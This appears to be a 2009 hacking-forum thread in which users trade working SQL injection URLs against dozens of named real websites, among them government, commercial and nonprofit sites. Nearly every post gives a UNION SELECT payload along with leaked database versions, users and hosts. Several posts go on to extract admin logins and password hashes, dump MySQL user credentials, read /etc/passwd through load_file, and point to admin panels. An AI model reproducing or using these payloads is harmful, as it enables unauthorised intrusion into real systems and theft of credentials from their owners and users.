http://www.infotronica.ro/produs.php?id=-P:229-S:41+UNION+SELECT+1,2,concat_ws(0x3a,version(),dat abase(),user(),@@version_compile_os),4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20+limit+1,1

http://www.infotronica.ro/produs.php?id=-P:229-S:41+UNION+SELECT+1,2,CONCAT((SELECT+CONCAT_WS(0x3 a,Email,Parola,Nume)+FROM+tronica_infotr.angajati+ LIMIT+0,1)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20+limit+1,1

Database Version: 5.0.81-community-log
Database name: tronica_infotr
User name: tronica_hogast@localhost
Os: unknown-linux-gnu

Ctacok
05.11.2009, 00:44
http://www.echodelta.net/gaer/aerodrome.php4?id=-144+union+select+1,concat_ws(0x3c42523e,user(),dat abase(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15 +--+
User: echodeltecho1@10.0.65.111
Database: echodeltecho1
Version: 4.0.25-standard-log

Ctacok
05.11.2009, 08:52
http://www.bigrpromotions.com/view.php?postID=-364+union+select+1,2,3,4,concat_ws(0x3a,user(),dat abase(),version())+--+
User: mrgrim8888@72.167.232.203
Database: mrgrim8888
Version: 4.1.22-max-log

http://www.ad-titude.com/comments.php?postid=-140+union+select+1,2,concat_ws(0x3a,user(),databas e(),version()),4,5,6+--+

User: rene@ps12859.dreamhost.com
Database: content
Version: 5.0.67-userstats-log

Gorev
05.11.2009, 09:16
http://www.latodis-med.com/produs.php?id=74+UNION+SELECT+1,2,concat_ws(0x3a,v ersion(),database(),user(),@@version_compile_os),4 ,5,6,7,8,9,10,11,12,13+LIMIT+1,1--


Database Version: 5.0.82-msl-usrs-sure2-log
Database name: latodis_latodis
User name: veterinare@localhost
Os: unknown-linux-gnu

Ctacok
05.11.2009, 09:24
http://abstinenceeurope.org/blog/index.php?postid=-136+union+select+1,2,3,4,concat_ws(0x3a,user(),dat abase(),version()),6,7,8,9+--+
User: abstinence@localhost
Database: abstinencedb
Version: 4.1.22

http://www.autozap.ru/forum/index.php?postid=-7208+union+select+1,2,3,4,5,6,concat_ws(0x3a,user( ),database(),version())+--+
User: autozap@mail.autozap.ru
Database: autozap
Version: 5.0.24a-community-nt

Kamik
05.11.2009, 10:12
Site of some airline

http://www.ctaholidays.net/beta/holiday_details.php?id=1225586740+union+select+1,2 ,3,4,5,6,7,concat_ws(0x3a,user(),database(),versio n()),9,10,11,12,13,14,15--

sercanak_main@localhost:sercanak_ctav2:5.0.81-community-log

Then I got here by accident

http://www.ctaholidays.net/beta/holiday_details.php?id=1225586740+union+select+1,t able_name,3,4,5,6,7,8,9,10,11,12,13,14,15+from+inf ormation_schema.tables+limit+21,100--

Table 'sercanak_ctav2.holiday_to_insurance' doesn't existUnknown column '_users' in 'where clause'
Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home1/sercanak/public_html/ctaholidays/beta/classes/connection.cls.php on line 53

Take it from here yourselves ;)

547
05.11.2009, 12:00
http://www.hlhclub.ru/state.php?id=-45+union+select+1,2,concat_ws(0x3a,user(),database (),version(),@@version_compile_os),4--

hlhclu01@fe74.hc.ru:wwwhlhclubru:4.1.25-log:portbld-freebsd6.4

*uNkN0Wn*
05.11.2009, 12:37
http://www.discusmedia.com/catalog.php?id=24751+and+1=0+ Union Select 1,2,3,4,concat_ws(0x3a,user(),database (),version(),@@version_compile_os),6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35

photoeu@74.220.215.75:photoeu:5.0.75:pc-linux-gnu

Bramin
05.11.2009, 14:01
http://www.foodlink.ru/index.php?category=-4+union+select+1,2,concat_ws(0x3a,user(),version() ,database()),4,5--

5.0.87:food1@localhost:foodlink

http://www.el-star.ru/useful.php?id=1+union+select+1,concat_ws(0x3a,vers ion(),database(),user()),3,4,5,6,7,8--

4.1.25-log:wwwanthostnet:anthost@localhost

http://catalog.arh-info.ru/index.php?cat=2&subcat=8+union+select+1,2,3,concat_ws(0x3a,version (),database(),user()),5--

5.0.77:www_new_catalog:nmarroot@localhost

http://www.samarainfo.ru/index.php?category=13+union+select+1,2,concat_ws(0 x3a,version(),user(),database()),4,5

5.0.77:samarainfo_root@localhost:samara_info
Table: dev_admin1t

*uNkN0Wn*
05.11.2009, 15:12
http://www.marsvenus.com/members/articles.php?id=-42+union+select+1,2,3,concat_ws(0x3a,user(),databa se(),version(),@@version_compile_os),5,6,7,8,9%20, 10,11,12,13,14,15,16,17,18,19,20--
dbo204999831@localhost:db204999831
4.0.27-standard:pc-linux-gnu

Bb0y
05.11.2009, 16:50
http://www.komdiv.ru/viewnews.php?id=-9+union+select+1,2,3,4,group_concat(0x0b,column_na me),6+from+information_schema.columns+where+table_ name=0x70687062625f666f72756d7573657273--
MySQL 5.1.36-log
http://www.komdiv.ru/viewnews.php?id=-9+union+select+1,2,3,4,group_concat(0x0b,username, 0x3a,user_password),6+from+phpbb_forumusers--

Roston
05.11.2009, 18:00
http://www.skylink39.ru/catalog.php?id=64+union+select+1,2,3,concat_ws(0x2 03B20,user(),database(),version()),5,6,7,8,9,10,11 ,12,13+--+
User: skylink2_mysql@10.1.93.176
Database: skylink2_db
Version: 4.1.22-log

547
05.11.2009, 19:06
http://www.endchildpoverty.org.uk/news.php?id=-23+union+select+1,2,3,version(),5,6,7,8,9--

5.0.44

http://www.herpconstrust.org.uk/news/expand-news.php?id=-85+union+select+1,2,3,4,user(),6,7,8--

4.1.19-standard-log

Gorev
05.11.2009, 21:09
http://vintage-avenue.com/details.php?id=-102+union+select+1,concat_ws(0x3a,version(),databa se(),useR(),@@version_compile_os),3,4,5,6,7,8,9,10--

Database Version: 4.1.22-log
Database name: whvintagexpresscom
User name: vintagexpressco@193.226.163.129
Os: redhat-linux-gnu

Gorev
05.11.2009, 21:21
http://www.granitstore.ro/detalii-produs.php?id=-97+UNION+SELECT+1,2,3,4,concat_ws(0x3a,version(),d atabase(),useR(),@@version_compile_os),6,7,8,9,10, 11,12,13,14,15--



http://www.granitstore.ro/detalii-produs.php?id=-97+UNION+SELECT+1,2,3,4,concat_ws(0x3a,utilizator, parola),6,7,8,9,10,11,12,13,14,15+from+admin+limit +1,1--


admin:e0ee1d48f2a4697296e3e30d47cb2c
the admin panel is at the classic address, but the hash is very interesting, since the guru bruteforcers and hash crackers couldn't identify it

Database Version: 5.0.51a-3ubuntu5.4
Database name: granit_store
User name: granitstore@localhost
Os: debian-linux-gnu

547
05.11.2009, 22:37
http://www.goldcoastoceanfest.co.uk/news.php?id=-1+union+select+1,version(),3,4--

5.0.44

ILYAtirtir
05.11.2009, 23:08
Federal authorities in Tatarstan
http://www.federal16.ru/index.php?page=content&DocID=6585&nmonth=1259614800&ndate=22)+union+select+1,2,3,4,5,6,concat_ws(0x3a, database(),user(),version()),8,9,10,11,12/*
federal16:federal16@localhost:4.0.20-log

World Organization "United Cities and Local Governments", Eurasia Regional Section
http://www.euroasia-uclg.ru/index.php?i=252+union+select+concat_ws(0x3a,databa se(),user(),version())
b53750_russian:u53750@78.108.84.81:5.0.85


Design studio "Амигос" - logos, corporate identity, website creation, printing, web design, domain registration. Kazan
http://www.samigos.ru/index.php?i=2&v=1&cat=-3+union+select+1,2,concat_ws(0x3a,database(),user( ),version())
samigos_samigos:samigos_samigos@localhost:4.1.22-standard

min7
05.11.2009, 23:25
tIC 120
http://www.studycanada.ru/cgi-bin/issue.cgi?action=showforum&cat_id=18&fid=3/**/union/**/select/**/1,concat_ws(char(58,58),user(),database(),version( )),3,4,5,6,7/*
main1@localhost::canada::4.1.20

Ctacok
06.11.2009, 09:51
http://do.omgups.ru/content.php?session=0&fid=-3+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5+--+

User: root@localhost
Database: do
Version: 5.0.51b-community-nt

HAXTA4OK
06.11.2009, 10:22
http://www.yamaha-hifi.de/index.php?lang=e&country=DE&idcat1=1&idcat2=2+union+select+1,concat_Ws(0x3a,user(),data base(),version()),3,4--

web5@localhost:usr_web5_1:4.0.15-Max

http://www.eicta.org/index.php?id=32&id_article=50+and+substring(version(),1,1)=5--

547
06.11.2009, 11:37
http://www.shooflypublishing.co.uk/news.php?id=-9+union+select+1,2,3,version(),5,6,7,8,9,10--

4.1.22 standart

TurboTROYAN
06.11.2009, 16:28
http://starkis.ru/show_cat2.php?grid=-1+union+select+concat_ws(0x3a,user(),version(),dat abase())--

starkis1@localhost:5.0.24-standard:db_starkis1

TIC 10

pelligrim
06.11.2009, 17:16
http://www.fcshakhter.by/stat_docs.php?cid=-1+union+select+1,cast(concat_ws(0x3a,version(),dat abase(),user())+as+binary),3,4,5--

4.1.11-Debian_4sarge8-log:fcshakhter:fcshakhter@localhost

http://top.mlmbiz.ru/detail.php?id=207+and+substring(version(),1,1)=4

4.0.27-max-log

DezMond™
06.11.2009, 19:21
http://planit.cuna.org/12881/article.php?doc_id=-943'+union+select+1,2,3,4,5+--+

http://www.airram.com/gallery.php?categoryid=3+union+select+1,2,3,4,5,6, 7,8,9+--+

http://businessandfinancemagazine.com/magazine.php?id=-59+union+select+1,concat_Ws(0x3a3a,username,passwo rd),3,4,5,6,7,8,9,10+from+www_users+--+

http://www.pracawmetropolii.co.uk/search.php?id=-2869+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20+--+

http://bfbusinessclub.com/view.php?id=-552+union+select+1,group_concat(table_name),3,4,5, 6,7,8,9,10,11,12,13,14+from+information_schema.tab les+--+

http://www.treasurevalleykidsdirectory.com/magazine.php?id=-55+union+select+1,2,concat_ws(0x3a3a,username,pass word)+from+users+/*+

[x60]unu
06.11.2009, 20:19
k-konstruktor.ru - TC=10
http://www.k-konstruktor.ru/index.html?id=135&parent_id=5/**/and/**/1=2/**/union/**/all/**/select/**/1,1,1,1,1,version(),1,1/**/from/**/sys_users
version - 5.0.51a-24+lenny2-log
user - k_konstruktor_ru@localhost
database - k_konstruktor_ru
table - sys_users (user_password, user_login )
http://www.k-konstruktor.ru/index.html?id=135&parent_id=5/**/and/**/1=2/**/union/**/all/**/select/**/1,1,1,1,1,concat(user_login,0x3a,user_password),1, 1/**/from/**/sys_users

admin panel - http://k-konstruktor.ru/admin/logon/index.html

mailbrush
06.11.2009, 20:46
http://www.calvert-wire.com/show_product.php?id=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion())
root@localhost:calvert_wirecom1:5.1.30-community

http://www.calvert-wire.com/show_product.php?id=-1+union+select+load_file('C:/Inetpub/wwwroot/calvert-wire/show_product.php')

hack-win32
06.11.2009, 20:47
bbeheer@localhost:cvc:5.0.37-community
http://www.cvc.nl/trainers.php?id=-25+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(), database(),version()),8,9--


ruf_user@localhost:ruf_http:5.0.45-community-nt
http://www.rockiurbanfitness.com.au/trainers.php?id=-4+union+select+1,2,3,4,concat_ws(0x3a,user(),datab ase(),version())--


tcbo01be@localhost:bosterhout:4.1.21-standard
http://www.tcbosterhout.be/trainers.php?id=-9+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7,8--

silencej@62.182.63.19:silencej:5.1.34-0.dotdeb.0
http://www.pianc.org/edits/article.php?id=-4000501+union+select+1,2,3,4,5,6,7,concat_ws(0x3a, user(),database(),version()),9,10,11,12,13,14,15,1 6,17,18,19,20,21--

*uNkN0Wn*
06.11.2009, 22:02
http://www.myworldhardware.com/v4/articles.php?ID=104&Page_ID=-1+union+select+1,2,3,concat_ws(0x3a,user(),databas e%20(),version(),@@version_compile_os),5--
myworldhw_data01@localhost:myworldhw_data01:5.0.67-community:redhat-linux-gnu

Bb0y
06.11.2009, 22:39
http://www.zlinaero.com/eng/viewvideo.php?id=-4+union+select+1,2,group_concat(0x0b,column_name), 4,5+from+information_schema.columns+where+table_na me=0x61757468&img=
MySQL 5.0.77
http://www.zlinaero.com/eng/viewvideo.php?id=-4+union+select+1,2,group_concat(0x0b,id,0x3a,useri d,0x3a,pass),4,5+from+auth&img=
auth::id,
userid,
pass,
cognome,
nome,
permessi,
vedimodi,
expertmode,
progettista,
disegnatore,
costo,
attivo

^YaHoo^
07.11.2009, 00:25
http://www.kingmotors.ru/view_car_sold.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user(),@@version_compile_os),3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23--
4.1.22-lk-log:kingmotors_king:kingmotors_king@localhost:pc-linux-gnu

onbka
07.11.2009, 03:48
Sex shop Oo
http://www.buderotic.com/shop.php?type=-19 union select 1,concat_ws(0x2d ,version(),user(),da tabase()),3 --
5.0.87:buderoti_site@localhost:buderoti_buderotic

http://lipari.ru/?pageID=-1 union se lect 1,concat_w s(0x2d,version(),user(),database()) --
5.0.51a-15-log:u1697@george-in:u1697

-JC-
07.11.2009, 04:26
http://www.iglobalforum.com/conference_live.php?r=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0 x3a3a,user(),database(),version()),13,14,15,16,17, 18,19,20+--+

*uNkN0Wn*
07.11.2009, 09:51
http://ldei.ugr.es/ldei/inv/inv.php?id=-3+Union+Select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7,8,9,10,11,12,13,14 --
root@localhost:biblioteca
Version: 5.0.51b-community-nt-log

hack-win32
07.11.2009, 12:29
rim1234@localhost:marmoon:5.0.51a-24+lenny1-log
http://www.marmoon.com/games.php?id=-464+union+select+1,2,3,concat_ws(0x3a,user(),datab ase(),version()),5,6,7,8,9,10,11,12,13--


yoquiero_dan@localhost:yoquiero_games:4.1.22-standard
http://www.yoquierogames.com/games.php?id=-98+union+select+1,2,3,concat_ws(0x3a,user(),databa se(),version()),5,6,7,8,9,10,11,12,13--


rebous@localhost:rebounddb:4.1.22-log
http://www.reboundsports.co.uk/tips-games.php?id=-34+union+select+1,2,3,concat_ws(0x3a,user(),databa se(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31--

pelligrim
07.11.2009, 15:12
http://www.present-show.ru/corporate.php?id=-1+union+select+1,2,3,4,cast(concat_ws(0x3a,version (),database(),user())+as+binary),6,7,8,9,10,11--

4.1.11-standard:db_presentshow:presentshow@localhost

http://www.yamaha-center.ru/?vid=opis&obj=v&id=-3+union+select+concat_ws(0x3a,version(),database() ,user()),2--

4.1.25-log:wwwkottedg_clubru_specuch:kottedgc_specuch@loc alhost

http://www.mos-afisha.ru/?page=17&id=-3+union+select+concat_ws(0x3a,version(),database() ,user())--

4.1.22-log:melbis:melbis@10.0.1.201

^YaHoo^
07.11.2009, 16:16
http://backgammon.gambler.ru/tournir/arch.php?tournir_id=-11+union+select+concat_ws(0x3a,version(),database( ),user(),@@version_compile_os)--
5.0.85:keks:keks@localhost:portbld-freebsd7.2

http://www.vashstile.ru/profile.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user(),@@version_compile_os),3,4,5,6,7,8,9,10--
5.0.22-log:admin_vashstile:admin_vashstile@localhost:unkn own-freebsd6.0

http://www.pin-code.ru/?pageId=1&subId=1+union+select+1,concat_ws(0x3a,version(),da tabase(),user(),@@version_compile_os),3,4,5,6,7,8, 9,10
5.0.77-log:pincode:pincode@localhost:portbld-freebsd6.3

http://www.funkit.ru/index.php?deviceCatID=1/**/union/**/select/**/concat_ws(0x3a,user(),database(),version())
funkit@localhost:funkit:5.0.77

http://www.9-ka.ru/index.php?nav=1'/**/union/**/select/**/1,concat_ws(0x3a,user(),database(),version()),3,4, 5/*
only I have a problem here: it does not output the user

http://feodorovski.spb.ru/katalog.php?vars=1+union+select+1,concat_ws(0x3a,v ersion(),database(),user(),@@version_compile_os),3 ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
5.1.19-beta:feodorovski:feodorovski@localhost:portbld-freebsd6.2

[x60]unu
07.11.2009, 16:25
http://pecpl.ru/main/index.html?id=1&nid=2/**/and/**/1=7/**/union/**/all/**/select/**/1,user(),1,version(),1,1,1,1/**/from/**/sys_users/**/limit/**/0,1
user - pecpl_ru@localhost
version - 5.0.51a-24+lenny2-log
database - pecpl_ru
table - sys_users (user_login, user_password)

http://pecpl.ru/main/index.html?id=1&nid=2/**/and/**/1=7/**/union/**/all/**/select/**/1,user_login,3,user_password,5,6,7,8/**/from/**/sys_users/**/limit/**/0,1

adminpanel - http://pecpl.ru/admin/logon/index.html

heyda4her
07.11.2009, 18:33
http://www.pharmacy-pal.com/product.php?cid=415

http://www.pharmacy-pal.com/product.php?cid=415+and+1=2

http://www.pharmacy-pal.com/product.php?cid=14)+UNION+SELECT+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20,21,CONCAT(0x7873 716C696E6A626567696E,Version(),0x2F2A2A2F,Database (),0x2F2A2A2F,User(),0x7873716C696E6A656E64),23,24 ,25,26/*

pharmacy_altec@localhostxsqlinjend

Root-access
07.11.2009, 23:26
Here is a small batch of SQL injections on fairly popular sites:

SU-HSE: _http://www.hse.ru/pressa2002/default.php?show=123+and+ascii(lower(substring(ver sion(),1,1)))=51

UpTime: _http://uptime.ru/downtime.php?host_id=-1+union+select+login,2,password,4,5,6,7,8,9,10,11, 12+from+users+limit+1,1

MIOO: _http://www.mioo.ru/podrnews2.php?idvalue=2144+and+ascii(substring(ver sion(),1,1))=53/*

ManageeCMS: _http://www.managee.ru/system/admin/?module=entry&action=edit&block=gallery&master_id=' (you need to log in at _http://www.managee.ru/demo/)
_http://managee.ru/search/?q=%27&strict=0

PTsUO: _http://couo.ru/search.asp (enter ')

edge911
07.11.2009, 23:35
MSSQL
http://www.hotellikajaani.fi/index.asp?pid=79%27+or+79=(select+top+1+table_name +from+information_schema.tables+where+table_name+n ot+in+(%20%27www_pagelogic%27,%27www_pagetype0_set tings%27,%27www_pagetype1_settings%27,%27www_paget ype2_settings%27,%27www_pagetype3_settings%27,%27w ww_pagetype4_settings%27,%27www_pagetype8_settings %27,%27www_pagetypes%27,%27www_settings%27,%27www_ template1c_specs%27))%20--


http://www.championchip.fi/index.asp?pid=8%27+or+8=@@version%20--

PR 4

Bb0y
08.11.2009, 00:42
http://www.yu-tour.ru/country.php?id=-9+union+select+1,2,3,4,5,6,7,8,9,10,column_name,12 ,13,14,15+from+information_schema.columns+where+ta ble_name=0x6d6f64466565646261636b55736572--
MySQL 5.0.45-log
http://www.yu-tour.ru/country.php?id=-9+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a ,login,0x3a,password),12,13,14,15+from+modFeedback User--
modFeedbackUser::id:name:login:,password:,post
http://www.yu-tour.ru/admin
outputs all rows at once

onbka
08.11.2009, 00:43
Rolemancer
http://rolemancer.ru/sections.php?op=listarticles&secid=-87 union select concat_ws(0x3a ,user(),version( ),database()),2,3,4,5

rolemancer@localhost:5.0.75-0ubuntu10.2:rolemancer

-JC-
08.11.2009, 08:33
http://www.graphicjunkiehosting.co.uk/knowledgebase/index.php?cat=1+group+by+1+union+select+1,2,versio n()/*

SpYeR
08.11.2009, 08:39
mssql 2008: http://kbaptupa.ru/dir/linkdetail.aspx?id=764+order+by+6+--



msaccess: http://www.sectsco.org/RU/show.asp?id=304+or+1=1
pr 7 cy 160, official site of the Shanghai Cooperation Organisation, lol.

onbka
08.11.2009, 14:09
http://www.wargames.ru/sections.php?op=listarticles&secid=-299 union all select 1,concat_ ws(0x3a,user(),database(),version()),3,4,5

wargames@localhost:Wargames:5.0.75-0ubuntu10.2


http://www.ccg.ru/sections.php?op=listarticles&secid=-291 union all select 1,concat_ws(0x3a,user(),database( ),version()),3,4,5 --

ccg@localhost:CCG:5.0.75-0ubuntu10.2

KNR
08.11.2009, 14:14
http://www.alfacomponent.com/index.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,database(),u ser(),version(),@@version_compile_os),6

alfachip_alfacomponent:alfachip_user@localhost:4.0 .27-standard:pc-linux-gnu
Couldn't find the table (

[x60]unu
08.11.2009, 17:37
theanimatedseries.890m.com -
http://theanimatedseries.890m.com/showcomments.php?postid=1/**/and/**/1=7%20/**/union/**/all/**/select/**/1,version(),3,4,5+from+users--
version - 5.0.81-community
user - a1811734_madnote@localhost
database - a1811734_imanga
table - users (username, password)
http://theanimatedseries.890m.com/showcomments.php?postid=1/**/and/**/1=7%20/**/union/**/all/**/select/**/1,concat_ws(0x3a,username,password),3,4,5+from+use rs--
admin panel - http://theanimatedseries.890m.com/admin/

nikp
08.11.2009, 17:37
5.0.21 : rootr@localhost : % : rootr : : Y
http://www.guerreros.com.co/guerreros/popupNoticia.php?noticia=-1+union+select+0,1,concat_ws(0x203a20,version(),us er(),host,user,password,file_priv),3,4+from+mysql. user+limit+1,1--
http://www.guerreros.com.co/guerreros/popupNoticia.php?noticia=-1+union+select+0,1,load_file(0x2f6574632f706173737 764),3,4--

Bb0y
08.11.2009, 19:14
http://www.yoseikan-budo.be/intranet/ViewClub.php?id=-5+union+select+1,2,3,4,5,group_concat(0x0b,column_ name),7,8,9,10,11,12,13+from+information_schema.co lumns+where+table_name=0x64635f75736572
dc_user::user_id:user_level:user_pwd:user_nom:user _prenom:user_pseudo:user_email:user_post_format:us er_edit_size:user_pref_cat:user_lang:user_delta:us er_post_pub
MySQL 5.0.32-Debian_7etch11-log
http://www.yoseikan-budo.be/intranet/ViewClub.php?id=-5+union+select+1,2,3,4,5,group_concat(0x0b,user_id ,0x3a,user_email,0x3a,user_pwd,0x3a,user_level),7, 8,9,10,11,12,13+from+dc_user
softbb_membres::http://www.yoseikan-budo.be/intranet/ViewClub.php?id=-5+union+select+1,2,3,4,5,group_concat(0x0b,column_ name),7,8,9,10,11,12,13+from+information_schema.co lumns+where+table_name=0x736f667462625f6d656d62726 573

DezMond™
08.11.2009, 19:16
http://www.painkillerz.ca/archive.php?type=-3+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22+--+

https://www.magazineburst.com/newsite/magazine.php?mag=-424+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,gro up_concat(table_name)+from+information_schema.tabl es+/*+

http://cosmoguayana.net/galeria_prensa.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a3a,login,cont rasena,nombre,apellido,email,tipo,estado),6,7,8,9, 10,11+from+usuarios+limit+2,1+--+

http://www.chiroeco.com/article/chiropractic-magazine.php?id=-113+union+select+concat_ws(0x3a3a,username,passwor d,section)+from+administrators+limit+1,10+--+

Bb0y
08.11.2009, 22:00
http://yocshoppe.com/viewOrder.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,group _concat(0x0b,column_name)+from+information_schema. columns+where+table_name=0x6163636f756e7473
accounts::userid:username:passhash:logouttime:acco unttype:contact:comments
http://yocshoppe.com/viewOrder.php?id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,group _concat(0x0b,username,0x3a,passhash,0x3a,accountty pe)+from+accounts
MySQL 5.0.81-log
log in at http://yocshoppe.com/loginAccount.php

z00MAN
08.11.2009, 23:43
http://www.nolting.com/article.php?i=999+union+select+1,concat_ws(0x3a,us er(),version(),database()),table_name,4+from+infor mation_schema.tables/*

nmdbadmin@localhost:5.0.45-community-nt:nolting

PR: 3



http://odb.tamboff.ru/index.php?id=-9+union+select+unhex(hex(concat_ws(0x3a,version(), user(),database())))--&place=content

4.1.11:оdb@localhost:оdb

TIC=110



http://www.ib.ru/news/index.php?id=-999+union+select+1,concat_ws(0x3a,version(),user() ,database()),2,3,5,6,7

5.0.45-log:ib@localhost:ibnews

TIC: 425

Bb0y
09.11.2009, 02:19
http://www.rusich-media.ru/data.php?mod=data&path=peretagki&num=0&id=4+union+select+1,2,concat_ws(0x3a,user,0x3a,pas sword,0x3a,file_priv),4,5,6,7,8+from+mysql.user
MySQL 5.0.76-log
http://www.rusich-media.ru/data.php?mod=data&path=peretagki&num=0&id=4+union+select+1,2,load_file(0x2f6574632f706173 737764),4,5,6,7,8 - Reading files on the server
http://www.rusich-media.ru/admin sort of an admin panel

ILYAtirtir
09.11.2009, 04:46
Interparliamentary Assembly of the Member States of the Commonwealth of Independent States
http://www.iacis.ru/html/?id=17&nid=94899+union+select+1,2,3,4,5,6,7,8,9,10,11,12, 13,concat_ws(0x3a,database(),user(),version()),15, 16,17,18,19,20,21,22/*
iacis:iacis@localhost:4.1.20

Directorate of the Federal Registration Service for Perm Krai
http://frs.perm.ru/about/normativ/?action=view&id=777+union+select+1,concat_ws(0x3a,database(),us er(),version()),3,4,5
dbfrs2:frs@localhost:4.0.24_Debian-10sarge3-log

Directorate of the Federal Migration Service
for Perm Krai
http://fms.permregion.ru/index.php?Id=105+and+substring(version(),1,1)=5/*

Siberian Federal District
http://www.sibfo.ru/news/speech.php?action=art&nart=5532+and+substring(version(),1,1)=3

PUBLIC SAFETY CENTER - CENTURION
http://centurion.gov12.ru/clenspage-detail.htm?page_id=1'+and+substring(version(),1,1) =5/*

News agency "Federal News"
http://federalinform.ru/regnews.htm?ownrubric_id=3'%20and%20substring(vers ion(),1,1)=5/*

Twoster
09.11.2009, 09:37
http://www.belarus.kz/index.php?mod=news&nid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--+
http://tilashar.kz/forum/message.php3?pagelist=20&messageID=-1+union+select+1,2,3,4,5,6,7,8,9,10--+
http://staff.kz/page.php?content=vacancy_view&uin=-1+union+select+password+from+admins--+
http://dknews.kz/article.php?id=-1+union+select+1,2,3--+
http://okp.kz/comp_view_vacancy.php?vac_id=-1+union+select+1,2,3,4,5,6,7,8,9--+
http://www.zhebrivskiy.org/pages.php?id=-1+union+select+1,2,3,4--+
http://www.clearflourbread.com/news.php?news_id=1-1+union+select+1,2,3,4--+
http://autoshina.kh.ua/news.php?idnews=-1+union+select+1,2,3--+
http://www.rosstok.ru/newspubl.php?id_news=-1+union+select+1,2,3,4,5,6,7--+
http://www.egmont.ru/journals/articles.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20--+&print=yes
Being active! =)

-JC-
09.11.2009, 10:36
http://www.southveter.ru/catalog.php?id=-1+union+select+1,2,3,4,5,6,7,8,version(),10+--+

mailbrush
09.11.2009, 13:20
TIC: 130
http://www.rusconsult.ru/cms-news.php?mode=view_news&id=-1+union+select+1,2,3,concat_ws(0x3a,user(),databas e(),version()),5,6+from+cms_admin
root@zvm11:rusconsultru:5.0.77

http://www.rusconsult.ru/cms-news.php?mode=view_news&id=-1+union+select+1,2,3,concat_ws(0x3a,login,password ),5,6+from+cms_admin

http://www.rusconsult.ru/cms-news.php?mode=view_news&id=-1+union+select+1,2,3,concat_ws(0x3a,user_login,use r_pass),5,6+from+wp_users

http://www.rusconsult.ru/cms-news.php?mode=view_news&id=-1+union+select+1,2,3,concat_ws(0x3a,user,password) ,5,6+from+mysql.user

[x60]unu
09.11.2009, 14:10
foreign hosting:
http://lithium-hosting.net/info.php?item=1/**/and/**/1=2%20/**/union/**/all/**/select/**/1,concat_ws(char(42,42,42),version(),database(),us er(),@@version_compile_os),3/**/from/**/plans

version - 5.0.81-community-log
database - lithiumh_lithium
user - lithiumh_lithium@localhost
os - unknown-linux-gnu

http://lithium-hosting.net/info.php?item=1/**/and/**/1=2%20/**/union/**/all/**/select/**/1,concat_ws(char(42,42,42),ftp,domains,link),3/**/from/**/plans

SENIA
09.11.2009, 14:27
PR 5
http://www.ukrainianjournal.com/index.php?w=article&id=-9174+union+select+1,2,concat_ws(0x3a,id,login,pass word),4,5,6,7+from+uajournal_db.users--
Database Version: 5.0.85-log
Database name: uajournal_db
User name: uajournal_user@10.0.0.3

Bramin
09.11.2009, 14:39
http://www.urheilupuisto.com/index.php?id=-5+and+1=0+union+select+concat_ws(0x3a,version(),us er(),database()),2,3,4--

5.0.82sp1-enterprise-gpl:w3452267db@10.0.8.82:w3452267db

http://www.knowmag.ca/knowitalls/index.php?id=5+union+select+1,concat_ws(0x3a,versi on(),user(),database()),3--

4.0.27:know@199.175.106.40:know_db

http://www.verbenahotel.ru/index.php?id=-999+union+select+1,concat_ws(0x3a,version(),user() ,database()),3--

5.0.77:hotel_user@localhost:hotel_data

http://www.pizzifarm.com/index.php?id=-1+union+select+concat_ws(0x3a,version(),user(),dat abase())--

4.1.20:pizziadmin@localhost:pizzibs

maestra_toys
09.11.2009, 14:56
Guys, why are you all posting this?

If it's needed, here's one from me:

http://www.ovidiopol.com/news.php?id=1+union+select+1,2,3,concat_ws(0x3a,us er(),database(),version()),5,6%20--

Gorev
09.11.2009, 15:06
http://www.daily-rent.ro/details.php?lang=en&id=-30+UNION+SELECT+1,concat_ws(0x3a,version(),databas e(),user(),@@version_compile_os),3,4,5,6,7,8,9,10, 11/*



Database Version: 5.0.24a
Database name: daily_rent
User name: mihai-mir@localhost
Os: slackware-linux-gnu

547
09.11.2009, 19:06
_http://www.fcdenderdetime.be/news.php?id=-4+union+select+1,2,version(),4,5--

5.0.32-Debian_7etch11-log

http://www.netfestival.be/pages/news.php?id=-7+union+select+1,concat_ws(0x3a,database(),user(), version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8--

netfestinetfst:netfestinetfst@10.0.85.248:4.0.25-standard-log

http://www.abyssplongee.be/news.php?cid=26&id=-16+union+select+1,unhex(hex(group_concat(table_nam e+separator+0x0b))),3,4+from+information_schema.ta bles--

_http://www.hotel-ste-cecile.be/news.php?id=-1+union+select+1,version(),3,4,5,6,7,8--

Bb0y
09.11.2009, 19:35
http://novorosoil.ru/newsview.php?id=-4+union+select+1,2,3,4,column_name,6,7+from+inform ation_schema.columns+where+table_name=0x6f696c5f75 73657273
MySQL 5.0.26-log
oil_users::
id:name:,pass:type:session
